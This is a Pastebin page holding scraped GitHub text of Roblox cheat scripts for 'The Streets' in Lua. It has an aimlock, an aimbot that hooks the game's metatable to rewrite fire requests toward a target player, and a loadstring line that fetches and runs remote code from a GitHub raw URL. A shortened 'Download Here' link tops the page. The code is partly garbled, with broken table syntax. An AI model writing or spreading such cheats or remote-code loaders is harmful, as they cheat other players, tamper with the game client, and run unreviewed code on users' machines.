Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- -
- Download Here --> https://tinyurl.com/5eabk3ee (Copy and Paste Link)
- Name already in use
- A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
- The-Streets-Scripts / Aimlock (Normal Streets Only)
- This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Open with Desktop
- View raw
- Copy raw contents Copy raw contents Copy raw contents
- This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode characters
- local ScreenGui = Instance.new("ScreenGui") local namebox = Instance.new("TextBox") ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui") ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling namebox.Name = "namebox" namebox.Parent = ScreenGui namebox.BackgroundColor3 = Color3.new(0, 0, 0) namebox.BorderColor3 = Color3.new(1, 1, 1) namebox.Position = UDim2.new(0, 0, 0.469287395, 0) namebox.Size = UDim2.new(0, 200, 0, 50) namebox.Font = Enum.Font.SourceSans namebox.Text = "" namebox.TextColor3 = Color3.new(0.937255, 0.937255, 0.937255) namebox.TextSize = 14 local Commands = local Prefix = "'" local Uis = game:GetService("UserInputService") local Ctrl = false Uis.InputBegan:Connect(function(Key, Typing) if not Typing then if Key.KeyCode.Name == "Semicolon" then namebox.Visible = true namebox.Text = "" wait() namebox:CaptureFocus() namebox:TweenSize(UDim2.new(0, 419, 0, 20), "Out", "Quad", 0.1, true) end end end) namebox.FocusLost:Connect(function(Foc) if Foc == true then namebox:TweenSize(UDim2.new(0, 0, 0, 20), "Out", "Quad", 0.1, true) wait() namebox.Visible = false game.GetService(game, "Players"):Chat(Prefix..namebox.Text) end end) Uis.InputEnded:Connect(function(input) if input.KeyCode.Name == "LeftAlt" then Ctrl = false namebox.Visible = false end end) local function Notify(title, text, icon, time) game.StarterGui:SetCore("SendNotification", Title = title; Text = text; Icon = icon; Duration = time; >) end Notify("zxciaz", "Welcome to my seperate aimlock from Citizen V2 for the streets, Enjoy!", "", 3) local function AddCommand(CmdName, Desc, Func) Commands[#Commands + 1] = ["Name"] = CmdName; ["Description"] = ","..Desc..""; ["Function"] = Func; >; end local function Search(CmdName) for _, v in pairs(Commands) do if v.Name == CmdName then return v.Function end end end local function CheckCmd(Cmd) Cmd = string.lower(Cmd) if Cmd:sub(1, #Prefix) == Prefix then local args = string.split(Cmd:sub(#Prefix + 1), " ") local CmdName = Search(table.remove(args, 1)) if CmdName and args then return CmdName(args) end end end local function psearch(Name) local Plr; for _, v in pairs(game:GetService("Players"):GetPlayers()) do if string.lower(string.sub(v.Name, 1, string.len(Name))) == string.lower(Name) then Plr = v elseif Name == "me" then Plr = game.Players.LocalPlayer elseif Name == "all" then Plr = game.Players end end if Plr then return Plr end end local Players = game:GetService("Players"); local LocalP, Mouse = Players.LocalPlayer, Players.LocalPlayer:GetMouse(); local Aimlock, AV = false, 5 --Aimlock Commands AddCommand("aimlock", "aimlock plr", function(args) local AimlockTarget = psearch(args[1]) Notify("zxciaz", "Aimlock Target: "..(AimlockTarget.Name), "", 3) Aimlock = true Mouse.Button1Down:Connect(function() if LocalP.Character:FindFirstChildWhichIsA("Tool") then ALTool = LocalP.Character:FindFirstChildWhichIsA("Tool") if Aimlock == true and AimlockTarget ~= nil and AimlockTarget.Character:FindFirstChild("Torso") then LocalP.Backpack.Input:FireServer("m1", ["mousehit"] = AimlockTarget.Character.Torso.CFrame + AimlockTarget.Character.Torso.Velocity/AV; ["velo"] = math.huge; >) end end end) end) AddCommand("unaimlock", "unaimlock plr", function(args) Aimlock = false AimlockTarget = nil end) LocalP.Chatted:Connect(function(Msg) CheckCmd(Msg) end)
- Name already in use
- A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
- The-Streets-Scripts / New Aimbot
- This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Open with Desktop
- View raw
- Copy raw contents Copy raw contents Copy raw contents
- This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode characters
- getgenv().SelectTargetKey = "E" -- Must be Capital due to UserInputService getgenv().AimPart = "Torso" -- Head or Torso, Dont do HumanoidRootPart getgenv().AV = 10 -- Sets AimVelocity, if your ping is high make sure its 7-10 / if your ping is low make sure its 4-6 local Players, Uis, RService = game:GetService("Players"), game:GetService("UserInputService"), game:GetService("RunService") local Client, Mouse, Camera, CF = Players.LocalPlayer, Players.LocalPlayer:GetMouse(), workspace.CurrentCamera, CFrame.new; local Aimlock, Selecting = true, false local StreetsID, PrisonID = tonumber(455366377), tonumber(4669040); Uis.InputBegan:Connect(function(Key, Typing) if Typing then return end if Key.KeyCode == Enum.KeyCode[SelectTargetKey] then Selecting = true end end) Uis.InputEnded:Connect(function(Key, Typing) if Typing then return end if Key.KeyCode == Enum.KeyCode[SelectTargetKey] then Selecting = false end end) RService.Stepped:Connect(function() if Selecting == true and Mouse.Target.Parent:FindFirstChild("Humanoid") and Mouse.Target.Parent ~= Client.Character then AimlockTarget = Players:FindFirstChild(Mouse.Target.Parent.Name) Notify("xaxa", "Aimlock Target: "..tostring(AimlockTarget), "", 3) end end) getgenv().Notify = function(title, text, icon, time) game.StarterGui:SetCore("SendNotification", Title = title; Text = text; Icon = "rbxassetid://5793181157"; Duration = time; >) end local rm = getrawmetatable(game) or debug.getrawmetatable(game) or getmetatable(game); local ncall = rm.__namecall setreadonly(rm, false) rm.__namecall = newcclosure(function(self, . ) local Ag = local Method = getnamecallmethod() if Method == "FireServer" and Aimlock == true then if game.PlaceId ~= (PrisonID) and tostring(self) == "Input" and AimlockTarget ~= nil then Ag[2].mousehit = AimlockTarget.Character[AimPart].CFrame + AimlockTarget.Character[AimPart].Velocity/AV return ncall(self, unpack(Ag)) end if game.PlaceId == (PrisonID) and tostring(self) == "Fire" and AimlockTarget ~= nil then return ncall(self, AimlockTarget.Character[AimPart].CFrame + AimlockTarget.Character[AimPart].Velocity/AV) end end return ncall(self, unpack(Ag)) end) setreadonly(rm, true)
- Name already in use
- A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
- The-Streets-Scripts / Citizen V3
- This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Open with Desktop
- View raw
- Copy raw contents Copy raw contents Copy raw contents
- This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode characters
- loadstring(game:HttpGet("https://raw.githubusercontent.com/zxciaz/The-Streets-Scripts/master/CitizenV4", true))()
- Footer
- You can’t perform that action at this time.
- You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement